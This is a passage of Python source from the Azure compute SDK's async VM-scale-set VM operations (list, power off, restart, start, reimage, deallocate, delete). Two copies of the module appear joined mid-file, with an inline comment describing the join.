            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self.get_instance_view.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Synchronous GET of the /instanceView sub-resource: only 200 is a success.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualMachineScaleSetVMInstanceView', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_instance_view.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/instanceView'}  # type: ignore
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        virtual_machine_scale_set_name: str,
        filter: Optional[str] = None,
        select: Optional[str] = None,
        expand: Optional[str] = None,
        **kwargs: Any
    ) -> AsyncIterable["_models.VirtualMachineScaleSetVMListResult"]:
        """Gets a list of all virtual machines in a VM scale sets.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_machine_scale_set_name: The name of the VM scale set.
        :type virtual_machine_scale_set_name: str
        :param filter: The filter to apply to the operation. Allowed values are
         'startswith(instanceView/statuses/code, 'PowerState') eq true', 'properties/latestModelApplied
         eq true', 'properties/latestModelApplied eq false'.
        :type filter: str
        :param select: The list parameters. Allowed values are 'instanceView', 'instanceView/statuses'.
        :type select: str
        :param expand: The expand expression to apply to the operation. Allowed values are
         'instanceView'.
        :type expand: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either VirtualMachineScaleSetVMListResult or the result
         of cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualMachineScaleSetVMListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # Build the HTTP request for the first page (templated URL) or a
            # follow-up page (the server-provided next_link, forced to GET).
            if not next_link:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    virtual_machine_scale_set_name=virtual_machine_scale_set_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    select=select,
                    expand=expand,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    virtual_machine_scale_set_name=virtual_machine_scale_set_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    select=select,
                    expand=expand,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Deserialize one page and split it into (next_link, items) for AsyncItemPaged.
            deserialized = self._deserialize("VirtualMachineScaleSetVMListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            # Fetch a single page; raise on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        # Lazy async paging: no request is sent until the iterable is consumed.
        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines'}  # type: ignore
    async def _power_off_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Sends the initial POST to /poweroff; returns the deserialized body on 200,
        # None on 202 (accepted) — the LRO poller tracks completion.
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.OperationStatusResponse"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_power_off_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._power_off_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _power_off_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'}  # type: ignore
    @distributed_trace_async
    async def begin_power_off(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Power off (stop) a virtual machine in a VM scale set. Note that resources are still attached
        and you are getting charged for the resources. Instead, use deallocate to release resources and
        avoid charges.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param vm_scale_set_name: The name of the VM scale set.
        :type vm_scale_set_name: str
        :param instance_id: The instance ID of the virtual machine.
        :type instance_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
         result of cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # 'polling' is True (default AsyncARMPolling), False (no polling), or a custom method.
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.OperationStatusResponse"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Fresh LRO: issue the initial request; resumed LRO: skip it and use the token below.
        if cont_token is None:
            raw_result = await self._power_off_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal LRO response into the operation-status model.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_power_off.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'}  # type: ignore
    async def _restart_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Sends the initial POST to /restart; returns the deserialized body on 200,
        # None on 202 (accepted) — the LRO poller tracks completion.
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.OperationStatusResponse"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_restart_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._restart_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _restart_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'}  # type: ignore
    @distributed_trace_async
    async def begin_restart(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Restarts a virtual machine in a VM scale set.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param vm_scale_set_name: The name of the VM scale set.
        :type vm_scale_set_name: str
        :param instance_id: The instance ID of the virtual machine.
        :type instance_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
         result of cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # 'polling' is True (default AsyncARMPolling), False (no polling), or a custom method.
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.OperationStatusResponse"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Fresh LRO: issue the initial request; resumed LRO: skip it and use the token below.
        if cont_token is None:
            raw_result = await self._restart_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal LRO response into the operation-status model.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'}  # type: ignore
    async def _start_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Sends the initial POST to /start; returns the deserialized body on 200,
        # None on 202 (accepted) — the LRO poller tracks completion.
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.OperationStatusResponse"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_start_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._start_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'}  # type: ignore
    @distributed_trace_async
    async def begin_start(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Starts a virtual machine in a VM scale set.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param vm_scale_set_name: The name of the VM scale set.
        :type vm_scale_set_name: str
        :param instance_id: The instance ID of the virtual machine.
        :type instance_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
         result of cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # 'polling' is True (default AsyncARMPolling), False (no polling), or a custom method.
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.OperationStatusResponse"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Fresh LRO: issue the initial request; resumed LRO: skip it and use the token below.
        if cont_token is None:
            raw_result = await self._start_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal LRO response into the operation-status model.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'}  # type: ignore
# NOTE: extraction artifact — dataset statistics (avg_line_length=47.445186,
# max_line_length=361, alphanum_fraction=0.678802) were inlined here between
# two concatenated copies of this module; the second copy below has its
# comments and docstrings stripped.
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._virtual_machine_scale_set_vms_operations import build_deallocate_request_initial, build_delete_request_initial, build_get_instance_view_request, build_get_request, build_list_request, build_power_off_request_initial, build_reimage_all_request_initial, build_reimage_request_initial, build_restart_request_initial, build_start_request_initial
# Generic placeholder for the value produced by the optional 'cls' callback.
T = TypeVar('T')
# Signature of the optional 'cls' custom-deserialization callback accepted by
# every operation: (pipeline_response, deserialized_model, response_headers) -> Any.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineScaleSetVMsOperations:
    """Async operations on individual virtual machines inside a VM scale set.

    Instances of this class are typically created by the service client rather
    than instantiated directly — TODO confirm against the client factory.
    """
    # Convenience alias to the generated models module.
    models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client  # pipeline client used to send requests
        self._serialize = serializer  # request-body serializer
        self._deserialize = deserializer  # response-body deserializer
        self._config = config  # holds subscription_id, polling_interval, etc.
    async def _reimage_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Sends the initial POST to /reimage; returns the deserialized body on 200,
        # None on 202 (accepted) — the LRO poller tracks completion.
        cls = kwargs.pop('cls', None)  # optional custom response callback (ClsType)
        # Map auth/not-found/conflict statuses to their specific azure-core exceptions;
        # callers may extend/override via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_reimage_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._reimage_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _reimage_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'}
    @distributed_trace_async
    async def begin_reimage(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running reimage operation on a scale-set VM (POST /reimage).

        :param resource_group_name: The name of the resource group.
        :param vm_scale_set_name: The name of the VM scale set.
        :param instance_id: The instance ID of the virtual machine.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True (default AsyncARMPolling), False (no polling), or a custom
         AsyncPollingMethod.
        :keyword int polling_interval: Default waiting time between two polls if no Retry-After
         header is present.
        :return: AsyncLROPoller yielding OperationStatusResponse (or the result of cls(response)).
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        # Fresh LRO: issue the initial request; resumed LRO: skip it and use the token below.
        if cont_token is None:
            raw_result = await self._reimage_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal LRO response into the operation-status model.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_reimage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'}
    async def _reimage_all_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Sends the initial POST to /reimageall; returns the deserialized body on 200,
        # None on 202 (accepted) — the LRO poller tracks completion.
        cls = kwargs.pop('cls', None)  # optional custom response callback (ClsType)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_reimage_all_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._reimage_all_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _reimage_all_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'}
    @distributed_trace_async
    async def begin_reimage_all(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running reimage-all operation on a scale-set VM (POST /reimageall).

        :param resource_group_name: The name of the resource group.
        :param vm_scale_set_name: The name of the VM scale set.
        :param instance_id: The instance ID of the virtual machine.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True (default AsyncARMPolling), False (no polling), or a custom
         AsyncPollingMethod.
        :keyword int polling_interval: Default waiting time between two polls if no Retry-After
         header is present.
        :return: AsyncLROPoller yielding OperationStatusResponse (or the result of cls(response)).
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        # Fresh LRO: issue the initial request; resumed LRO: skip it and use the token below.
        if cont_token is None:
            raw_result = await self._reimage_all_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal LRO response into the operation-status model.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_reimage_all.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'}
    async def _deallocate_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        """Send the initial deallocate request for a single scale set VM.

        Returns the deserialized OperationStatusResponse on HTTP 200, or
        ``None`` on HTTP 202 (request accepted; operation still running).
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_deallocate_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._deallocate_initial.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 reply carries a body worth deserializing.
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _deallocate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'}
    @distributed_trace_async
    async def begin_deallocate(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running operation that deallocates a virtual machine
        in a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: An AsyncLROPoller whose result is an OperationStatusResponse.
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        # Poll interval: per-call override, else the client-wide default.
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No continuation token, so start the operation now. The lambda
            # keeps the raw pipeline response for the poller to inspect.
            raw_result = await self._deallocate_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # error_map was consumed by the initial request; drop it before polling.
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal response once the LRO completes.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            # Resume a previously started operation instead of issuing a new one.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_deallocate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'}
    async def _delete_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        """Send the initial delete request for a single scale set VM.

        Returns the deserialized OperationStatusResponse on HTTP 200, or
        ``None`` on HTTP 202/204 (accepted or nothing to delete).
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
